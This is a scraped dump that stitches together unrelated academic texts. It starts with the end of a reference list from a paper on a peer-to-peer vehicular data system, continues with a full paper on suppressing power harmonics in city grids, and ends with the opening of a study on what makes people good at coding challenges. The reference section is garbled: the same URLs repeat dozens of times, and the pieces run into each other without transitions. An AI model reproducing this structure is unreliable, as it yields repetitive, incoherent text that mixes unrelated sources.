Juan, Puerto Rico. Longley PA, Goodchild MF, Maguire DJ, Rhind DW. 2005. Geographic information systems and science. Hoboken: Wiley. LTE-EPC Network Simulator (LENA). release M5. Available at http://mailman.isi.edu/pipermail/ ns-developers/2013-January/010819.html. Mahmoud A, Olariu S. 2007. Zipper: a zero-infrastructure peer-to-peer system for VANET. In: Int.’l workshop on modeling analysis and simulation of wireless and mobile systems (MSWiM). Chania, Crete Island, Greece. Maymounkov P, Mazieres D. 2002. Kademlia: a peer-to-peer information system based on the XOR metric. In: 1st international workshop on peer-to-peer systems. Meneguette RI, Maia G, Madeira ERM, Loureiro AAF. 2014. Autonomic data dissemination in highway Vehicular Ad Hoc Networks with diverse traffic conditions. In: IEEE symposium on computers and communication (ISCC). Madeira, Portugal. Mohan P, Padmanabhan V, Ramjee R. 2008. Nericell: rich monitoring of road and traffic conditions using mobile smartphones. In: 4th ACM conference on embedded networked sensor systems (SenSys). Raleigh, North Carolina, USA. Mun M, Reddy S, Shilton K, Yau N, Boda P, Burke J, Estrin D, Hansen M, Howard E, West R. 2009. PEIR, the personal environmental impact report, as a platform for participatory sensing systems research. In: Int.’l conference on mobile systems, applications and services (MobiSys). Krakow, Poland. ns-3 Development Team. ns-3 Official Homepage. Available at http://www.nsnam.org. Papoulis A. 1991. Probability, random variables, and stochastic processes. Milano: McGraw Hill. Picone M, Amoretti M, Zanichelli F. 2011a. Proactive neighbor localization based on distributed geographic table. International Journal of Pervasive Computing and Communications 7(3):240–263 DOI 10.1108/17427371111173022. Picone M, Amoretti M, Zanichelli F. 2011b. Evaluating the robustness of the DGT approach Picone et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.15 30/31 https://peerj.com/computer-science/ http://dx.doi.org/10.1109/WC-M.2006.250356 http://dx.doi.org/10.1103/PhysRevE.55.5597 http://dx.doi.org/10.1016/j.comnet.2009.07.011 http://dx.doi.org/10.1109/WC-M.2006.250358 http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://mailman.isi.edu/pipermail/ns-developers/2013-January/010819.html http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://dx.doi.org/10.1108/17427371111173022 http://dx.doi.org/10.7717/peerj-cs.15 for smartphone-based vehicular networks. In: IEEE workshop on user mobility and vehicular networks. Bonn, Germany. Qureshi A, Carlisle J, Guttag J. 2006. Tavarua: video streaming with WWAN striping. In: ACM multimedia. ACM. Rybicki J, Scheuermann B, Kiess W, Lochert C, Fallahi P, Mauve M. 2007. Challenge: peers on wheels—a road to new traffic information systems. In: 13th annual ACM Int.l conference on mobile computing and networking (MobiCom). New York, New York, USA. Santa J, Moragon A, Gomez-Skarmeta AF. 2008. Experimental evaluation of a novel vehicular communication paradigm based on cellular networks. In: IEEE intelligent vehicles symposium. Eindhoven, Netherlands. Seskar I, Marie S, Holtzman J, Wasserman J. 1992. Rate of location area updates in cellular systems. In: IEEE vehicular technology conference (VTC ’92). Denver, Colorado, USA. Shinkawa T, Terauchi T, Kitani T, Shibata N, Yasumoto K, Ito M, Higashino T. 2006. A technique for information sharing using inter-vehicle communication with message ferrying. In: IEEE Int.’l conference on mobile data management (MDM ’06). Nara, Japan. Sip2Peer. 2014. sip2peer. Available at http://code.google.com/p/sip2peer. Stojmenovic I. 2008. Simulations in wireless sensor and ad hoc networks: matching and advancing models, metrics, and solutions. IEEE Communications Magazine 46(12):102–107 DOI 10.1109/MCOM.2008.4689215. Sun Microsystems, Inc. 2005. JXTA technology: creating connected communities. In: White paper. Santa Clara: Sun Microsystems. Tonguz O, Wisitpongphan N, Bai F, Mudalige P, Sadekar V. 2007. Broadcasting in VANET. In: Workshop on vehicular ad hoc networks (Move’07). Montreal, Canada. Trieber M, Hennecke A, Helbing D. 2000. Congested traffic states in empirical observations and microscopic simulations. Physical Review E 62(2):1805–1824 DOI 10.1103/PhysRevE.62.1805. Vakulenko A. Circles intersection library for MATLAB. Available at http://www.mathworks.com/ matlabcentral/fileexchange/5313. Wegener A, Hellbruck H, Fischer S, Schmidt C, Fekete S. 2007. AutoCast: an adaptive data dissemination protocol fro traffic information systems. In: 66th IEEE vehicular technology conference (VTC ’07). Dublin, Ireland. Wi-Fi Alliance. 2015. Wi-Fi Direct standard. Available at http://www.wi-fi.org/Wi-Fi Direct.php. Xiang Q, Chen X, Kong L, Rao L, Liu X. 2015. Data preference matters: a new perspective of safety data dissemination in vehicular ad hoc networks. In: IEEE INFOCOM. IEEE. Xu H, Barth M. 2006. An adaptive dissemination mechanism form inter-vehicle communication-based decentralized traffic information system. In: 9th Int’l IEEE conference on intelligent transportation systems (ITCS ’06). Toronto, Canada. Yan T, Zhang W, Wang G. 2014. DOVE: data dissemination to a desired number of receivers in VANET. IEEE Transactions on Vehicular Technology 63(4):1903–1916 DOI 10.1109/TVT.2013.2287692. Zhao J, Cao G. 2007. VADD: Vehicle-assisted data delivery in vehicular ad hoc networks. IEEE Transaction on Vehicular Technology 57(3):1910–1922 DOI 10.1109/TVT.2007.901869. Zhou B, Xu K, Gerla M. 2004. Group and swarm mobility models for ad hoc network scenarios using virtual tracks. In: IEEE military communications conference (MILCOM). Monterey, California, USA. Picone et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.15 31/31 https://peerj.com/computer-science/ http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://code.google.com/p/sip2peer http://dx.doi.org/10.1109/MCOM.2008.4689215 http://dx.doi.org/10.1103/PhysRevE.62.1805 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.mathworks.com/matlabcentral/fileexchange/5313 http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://www.wi-fi.org/Wi-Fi_Direct.php http://dx.doi.org/10.1109/TVT.2013.2287692 http://dx.doi.org/10.1109/TVT.2007.901869 http://dx.doi.org/10.7717/peerj-cs.15 D4V: a peer-to-peer architecture for data dissemination in smartphone-based vehicular applications Introduction Related Work V2V approaches V2I approaches Distributed Geographic Table D4V System Mobility Model Performance Evaluation DGT-based proactive localization D4V performance evaluation Conclusions References work_iknuu3cd7re2rntzs6qpbod3ki ---- 有色金属矿山电能质量 International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 35 Solutions for Governance and Suppression of Power Harmonic in Cities Li Xiangchu Hunan Nonferrous Metals Vocational and Technical College Zhuzhou, Hunan, 412006, China e-mail: hnysjxjwk@126.com Zhang wei Hunan Nonferrous Metals Vocational and Technical College Zhuzhou, Hunan, 412006, China Abstract—Based on the current status of cities’ power sup ply and distribution system, this paper conducts theoretica l and experimental investigations over the generation, harz ards as well as the restraining and suppression techniques of power harmonics. A solution of scheme selection for c ontrolling and suppressing power harmonics suitable for t he current power supply and distribution system of big a nd medium-sized cities is proposed. This study not only p rovides important implications for big and medium-sized c ities, but also provides substantial reference value for cont rolling and suppressing power harmonics in the public util ity system in China. Keywords-Power Harmonic; Governance and Suppression; Solution I. INTRODUCTION With the transformation and upgrading of industrial cities, the application of nonlinear load like converter, rectifier and inverter that use power semiconductor-cored insulated gate bipolar transistor (IGBT) and intelligent power module (IPM) has been widely used. While plenty of high power nonlinear converter equipments have their advancement and reliability in energy saving and controlling technology, its inherent characteristics will generate a large amount of harmonic, causing voltage and current waveform distortion in power supply system. [12] The consequence is that the power quality of utility grid is not up to standard or even worse, and the normal running and safety of utility grid and electrical equipment is badly influenced. Therefore, researches on the restraining and suppressing of power harmonics in urban utility grid have sound theoretical and practical values over improving power quality so as to better service the transformation and upgrading of the city. II. CAUSE OF POWER HARMONIC Power harmonic in city utility grid is mainly produced in the nonlinear load power equipment such as impact load, asymmetry load and the nonlinear load, with nonlinear load as the most important factor to produce electric power harmonic. [9] Inverter, uninterruptible power supply (UPS) and power converter equipment (such as rectifier and inverter), industrial computer and other high power nonlinear load are the harmonic source of utility grid. [7] With the transformation and upgrading of the inverter control in industrial control and other fields, the application of frequency converter is undergoing a wide spread. Therefore, inverter has become the main source of electric power harmonic in urban public grid. III. HAZARD OF POWER HARMONICS The harm caused by harmonic pollution of urban public power grid is reflected in many aspects. The main contents are as following. 1) Reducing the utilization rate of electrical equipment makes transformer, motor, power capacitors and other electrical equipments, as well as cables, Low pressure neutral line, busbar and other conductors working under the state of overload operation such as vibration, fever, abnormal sound, and etc. It shortens the service life of the electric power and increase electric energy loss.[13] 2) Interfering with relay protection, automatic devices and computer systems; Making the precision electronic equipment work abnormal, or even burn; Increasing the error of measuring and measuring instruments.[4] DOI: 10.21307/ijanmc-2019-019 International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 36 3) Reducing the quality of signal transmission and interfering communication system. Usually harmonics of 2000~5000Hz generates communication noise, while harmonics above 5000Hz lead to the disoperation of the signal of the telephone circuit. [8] IV. GOVERNANCE AND SUPPRESSION OF POWER HARMONIC In engineering, the governance and suppression of power harmonic in city utility grid is mainly divided into the following three types: 1) Series detuning reactor harmonic resonance amplifier is the main purpose of the measures to prevent because of reactive power compensation device (such as electric power capacitor, etc.) access to enlarge the excessive power harmonic and resonance occurs, but smaller filtering effect. [2-3] 2) Using passive power filter (PF) for harmonic governance. The passive power filter (PF) is a filter circuit that makes use of the combination of inductance, capacitance and resistance to filter out one or multiple harmonics. It Is currently the basic ways of city utility grid management and power harmonics restraining. Despite of its merits such as simple structure, low cost, reliable running and low-cost operating, still the harmonic governance effect is not ideal, and could lead to new problems such as oscillation of power supply and distribution system and harmonic amplification. [14] 3) Using active power filter (APF) for harmonic governance. The active power filter (APF) is a new type of special equipment based on modern power electronic technology and digital signal processing technology to govern electric power harmonics.[11] The basic principle of harmonic elimination is electricity generated during runtime equals the current amplitude of power harmonic, reversal polarity of harmonic current into the power supply system and compensate or offset the electric power harmonic current, and take the initiative to eliminate electric power harmonic. It has the merits of high control precision, fast response, good harmonic elimination effect and etc. Active power filter (APF) is a new research that enjoys a promising prospect in the field of future electric power harmonic governance and comprehensive optimization of power quality. V. SOLUTION FOR GOVERNANCE AND SUPPRESSION OF POWER HARMONIC IN CITIES A. About General Solution With increasingly attention paid to the governance of electric power harmonic, related industries get fast development during the period of “China's 13 th Five-Year Plan”. There are a large variety of measures and products for the governance of electric power harmonic. Establishing reasonable selection schemes can guide technical personnel to choose measures and products according to the actual circumstance of electric power harmonic in power supply and distribution system. [15] Based on the harmonic voltage limit and harmonic current allowable value regulated in the utility grid national standard GB/T14549-1993 Utility Grid Harmonic Power Quality, [1] this paper sets the nominal voltage of 0.38 kV for example, and establishes a model selection scheme for the power harmonic governance and suppression of urban utility grid, as is shown in figure 1. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 37 Figure 1. Model Selection for Power Harmonic Governance and Suppression B. Specific Solution for Power Harmonic Governance and Suppression By using technological upgrading projects as engineering case, this paper conducts researches on solutions for power harmonic governance and suppression. 1) About technological upgrading projects: A utility grid in Hunan is mainly composed of one transformer S9-1250, equipped with 480 kvar PGJ type of reactive power compensation device. Load is composed of 2 sets of 200 kva UPS, switching power supply and air conditioning. When the system runs, output cable of the transformer reaches 45 degrees centigrade, cable vibration and electronic equipment interference become bigger. [10] Customer’s technological upgrading requirements are as following: a) lowering the temperature rise of the cable and eliminating cable vibration; b) reducing interference of electronic devices. 2) Intended Solutions: Based on customer’s technological upgrading requirements, the project group did a lot of resourcing work and field investigation to make sure the design rationality of this power supply and distribution system. Field test shows the distortion rate of voltage total harmonic was 7.8%, the distortion rate of current total harmonic was 68.9%. UPS and six pulse rectifier are the main nonlinear load that generate harmonics. Comparative analysis of these data proves that this project is under serious harmonic pollution and hazard. According to Figure 1, the choice of active power filter can effectively suppress the electric power harmonic. Detailed solutions are as following: a) retaining reactive power compensation device PGJ type 480 kvar; b) one set of LEAPF4200-0.4 active power filter installed into two sets of UPS respectively. 3) Verification: After installation and debugging, voltage, current waveform and harmonic analysis of the power supply and distribution system are tested on the spot, and data before and after the power harmonic control and suppression are shown in Figure 2 and Figure 3. Harmonic pollution is slight International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 38 a) Voltage and current waveform-before b) Voltage and current waveform-after c) Voltage harmonic analysis-before d) Voltage harmonic analysis-after Figure 2. Voltage Waveform and Harmonic Analysis Before and After Power Harmonic Governance and Suppression a) Current Rms and waveform-before b) Current Rms and waveform-after c) Current harmonics analysis-before d) Current harmonics analysis-after Figure 3. Current Waveform and Harmonic Analysis Before and After Power Harmonic Governance and Suppression International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 39 It can be seen from Figure 2 Figure 3 that after harmonic control and suppression, the total harmonic distortion rate of the power supply and distribution system is reduced to 2.1%; the total harmonic distortion rate of current is reduced to 8.8%; the temperature in output-end cable of the transformer is 37 degree centigrade when room temperature is 26 degree centigrade; the cable vibration and electronic equipment interference are eliminated. [5-6] After field tests and function verifications, the solution above turns out to be reasonable and achieves the intended goals. VI. CONCLUSION Based on the harmonic voltage limit and harmonic current allowable value regulated in the utility grid national standard GB/T14549-1993 Utility Grid Harmonic Power Quality, a model selection scheme for the power harmonic governance and suppression of urban utility grid is established after theoretical and experimental studies on the causes, hazards as well as the governance and suppression technology. By using technological upgrading projects as engineering case, this paper proposes a solution that uses active power filter (APF) as the core device. After field test and functional verification, the scheme proves to be both reasonable and practical. It is a reference for the power supply and distribution system design of urban utility grid. REFERENCES [1] GB/T14549-1993, Quality of electric energy supply Harmonics in public supply network [S]. [2] Pan Zhaodong. Design of single-phase harmonic control system in mine [J]. Industrial and mining automation，2016.1. [3] Chen Xuemei. Analysis and management of frequency conversion harmonics of low voltage power grid in oil field [J] .Electrical applications，2016.3. [4] Li Lanfang. Harmonic analysis and hazard management of coal mine variable frequency speed control system [J] .Science and technology of Coal，2015.12. [5] Li Honghui. Research on harmonic management of coal mine dc hoist system [J] .Coal project engineering，2015.12. [6] Zhang Zhicheng. Research on harmonic management method of isolated island micro - grid [J] .power electronics technology， 2015.12. [7] Jiang Youhua. Decoupling and stability optimization of multi-harmonic source control system with tree distribution [J] .The grid technology，2015.3. [8] Ge Shaoyun. An empirical method for harmonic loss reduction of distribution network [J] .Journal of electrical systems and automation，2015.3. [9] Wang Huiwu. Power harmonic detection and estimation based on nonlinear theory [J] .Electrical measurement and meter，2016.3. [10] Li Demin. Power harmonic analysis based on FFT interpolation of four spectral line of Nuttal window [J] .Power system protection pre-control，2016.3. [11] Chen Dongyi. New parallel active power filter with current control [J] .Experimental technology and management，2016.2. [12] Zheng Kang. Discussion and application of harmonic wave and its control technology in mine power supply and distribution system [J] .The information of Power，2014.3. [13] Sun Yunfei. Research and application of harmonic control technology in Jiao-jia gold mine [J] .Electric power energy saving，2013.12. [14] Zhang Jingwei. Power quality control of power supply and distribution system in metallurgical plant [J] .Water conservancy and Power Industry，2013.12. [15] Zhao Yuman. Research on harmonic suppression and reactive power compensation in power system [D] .Liaoning University of Technology，2014.8. work_im2qrukbnra2vdfxqduhays26i ---- Submitted 30 August 2018 Accepted 10 January 2019 Published 4 February 2019 Corresponding author Marvin Wyrich, marvin.wyrich@iste.uni-stuttgart.de Academic editor Philipp Leitner Additional Information and Declarations can be found on page 32 DOI 10.7717/peerj-cs.173 Copyright 2019 Wyrich et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS A theory on individual characteristics of successful coding challenge solvers Marvin Wyrich, Daniel Graziotin and Stefan Wagner Institute of Software Technology, University of Stuttgart, Stuttgart, Germany ABSTRACT Background. Assessing a software engineer’s ability to solve algorithmic programming tasks has been an essential part of technical interviews at some of the most successful technology companies for several years now. We do not know to what extent individual characteristics, such as personality or programming experience, predict the perfor- mance in such tasks. Decision makers’ unawareness of possible predictor variables has the potential to bias hiring decisions which can result in expensive false negatives as well as in the unintended exclusion of software engineers with actually desirable characteristics. Methods. We conducted an exploratory quantitative study with 32 software engineering students to develop an empirical theory on which individual characteristics predict the performance in solving coding challenges. We developed our theory based on an established taxonomy framework by Gregor (2006). Results. Our findings show that the better coding challenge solvers also have better exam grades and more programming experience. Furthermore, conscientious as well as sad software engineers performed worse in our study. We make the theory available in this paper for empirical testing. Discussion. The theory raises awareness to the influence of individual characteristics on the outcome of technical interviews. Should the theory find empirical support in future studies, hiring costs could be reduced by selecting appropriate criteria for preselecting candidates for on-site interviews and potential bias in hiring decisions could be reduced by taking suitable measures. Subjects Software Engineering Keywords Programming performance, Coding challenge, Human factors, Personality, Experience, Happiness, Academic performance, Technical interview INTRODUCTION Some well-known technology companies, including Amazon, Facebook, Google and Microsoft, made applicants perform algorithmic programming tasks as part of their technical interview process (McDowell, 2015). The performance in these tasks might reveal how good a software engineer is at finding efficient and scalable algorithms to unknown problems and show his or her ability to debug and test a small piece of source code. In the following we refer to these tasks as coding challenges. Although aspects such as interpersonal skills play an important role in technical interviews (Ford et al., 2017), coding challenges form an essential part of the interviews and the subsequent evaluation of the candidates. How to cite this article Wyrich M, Graziotin D, Wagner S. 2019. A theory on individual characteristics of successful coding challenge solvers. PeerJ Comput. Sci. 5:e173 http://doi.org/10.7717/peerj-cs.173 https://peerj.com mailto:marvin.wyrich@iste.uni-stuttgart.de https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.173 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.173 1The Fizz-Buzz challenge is a trivial programming task that is used in interviews to filter out programmers with insufficient programming skills. The task is to write a program that prints the numbers from 1 to 100. But for multiples of three print ‘‘Fizz’’ instead of the number and for the multiples of five print ‘‘Buzz". For numbers which are multiples of both three and five print ‘‘FizzBuzz’’ (Ghory, 2007). To help candidates preparing for competitions, technical interviews and coding challenges in general, several books, online guides, practicing websites and experience reports exist (e.g., LeetCode, 2018; Dumitru, 2017; McDowell, 2015; Mongan, Kindler & Giguère, 2012). A plethora of material is available that aims to help the reader solve coding challenges successfully. We can see, however, that some software engineers perform better than others in solving coding challenges (Google Inc., 2017) and that this difference does not necessarily come all from preparation. Practitioners report that they met computer science graduates who could not even solve simple programming tasks like the Fizz-Buzz challenge1 up to developers who aced almost every challenge in the finals of internationally recognized programming competitions. As with programming performance (Scacchi, 1995), individual characteristics are likely to play a very important role in the performance of solving coding challenges. To the best of our knowledge, there is a knowledge gap in the software engineering literature to explain individual factors related to a successful solver. Addressing the knowledge gap about individual characteristics of successful coding challenge solvers could be favorable for software companies as well. The companies’ unawareness of possible predictor variables, such as a candidate’s personality, may lead to biased hiring decisions and candidates with actually desired personality traits having less chances of getting hired. Being aware of possible predictor variables could therefore help the company to better preselect candidates at an early stage of the interview process as well as identify ways to improve the current workforce. Furthermore, failure to understand which characteristics make for a great coding challenge solver might bring failure in a technical interview. Job opportunities might get lost. A knowledge gap in a research discipline, as in the case of coding challenges, requires the construction of theories. Kajko-Mattsson (2012) has argued that software engineering research has been suffering from a syndrome that causes researchers to jump from trend to trend. What happens is that isolated, usually small research problems are solved by one or more papers and then authors jump to a completely different issue. As a result, continues Kajko-Mattsson (2012), also echoed by Johnson, Ekstedt & Jacobson (2012), the research community lacks a deep, yet basic understanding of the software development life-cycle and the theory behind all software engineering activities. We support the recent request for developing theories in software engineering and we agree with several authors that theory is what software engineering is missing the most (Ralph, Johnson & Jordan, 2013; Johnson et al., 2013; Johnson, Ekstedt & Jacobson, 2012; Johnson & Ekstedt, 2015; Wohlin, Šmite & Moe, 2015). We conducted a study to explore the research question what individual characteristics make a good coding challenge solver? By a quasi-experiment, we empirically developed a theory for predicting the influence of such characteristics on the performance in solving coding challenges. We developed and evaluated the construction of the theory using an established framework for theories in information systems 